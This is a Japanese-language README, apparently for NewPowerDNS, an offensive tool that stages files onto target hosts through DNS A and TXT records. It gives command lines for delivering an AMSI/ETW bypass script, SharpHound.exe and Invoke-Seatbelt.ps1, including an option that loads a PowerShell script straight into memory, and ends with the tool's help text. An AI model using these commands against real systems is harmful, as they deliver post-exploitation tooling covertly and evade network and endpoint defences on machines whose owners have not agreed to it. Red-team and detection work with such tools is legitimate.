
@domchell による PowerDNS の更新版です。DNS A レコードを介した転送のサポートと、その他いくつかの便利な機能が追加されています。
NewPowerDNS は、@domchell's の PowerDNS を更新したバージョンです。主な追加機能は、DNS A レコードを使用したファイル転送のサポートです。以下に、行われた変更の完全なリストを示します:
python3 以外の唯一の依存関係は scapy です。次のように pip で簡単にインストールできます:
python3 -m pip install scapy
DNS A レコードと TXT レコードの両方でファイルを転送するデモ動画は以下を参照してください:
powershell スクリプトを DNS A レコードで転送し、コンソールに出力する:
python3 NewPowerDNS.py --file AmSeeETWBP.ps1 --domain sub.domain.com -r A -a print
exe ファイルを DNS TXT レコードで転送し、ディスクに保存する:
python3 NewPowerDNS.py --file SharpHound.exe --domain sub.domain.com -r TXT -a save
powershell スクリプトを DNS TXT レコードで転送し、メモリに自動的に読み込む:
python3 NewPowerDNS.py --file Invoke-Seatbelt.ps1 --domain sub.domain.com -r TXT -a exec
一般的な使用方法:
___ ___ _ _ ___
| . \ ___ _ _ _ ___ _ _ | . \| \ |/ __>
| _// . \| | | |/ ._>| '_>| | || |\__ \
|_| \___/|__/_/ \___.|_| |___/|_\_|<___/
DNS A Record & updated stager version by @icyguider
Original version by @domchell
usage: NewPowerDNS.py [-h] [-f <file>] [-d <domain>] [-a <action>] [-r <record-type>] [-i <interface>]
optional arguments:
-h, --help show this help message and exit
-f <file>, --file <file>
file to transfer
-d <domain>, --domain <domain>
domain with auth NS record
-a <action>, --action <action>
action to perform once data is transferred (options: save, exec, print)
-r <record-type>, --record-type <record-type>
type of DNS record to use for transfer (options: A, TXT) (default: TXT)
-i <interface>, --interface <interface>
interface to bind to (default: eth0)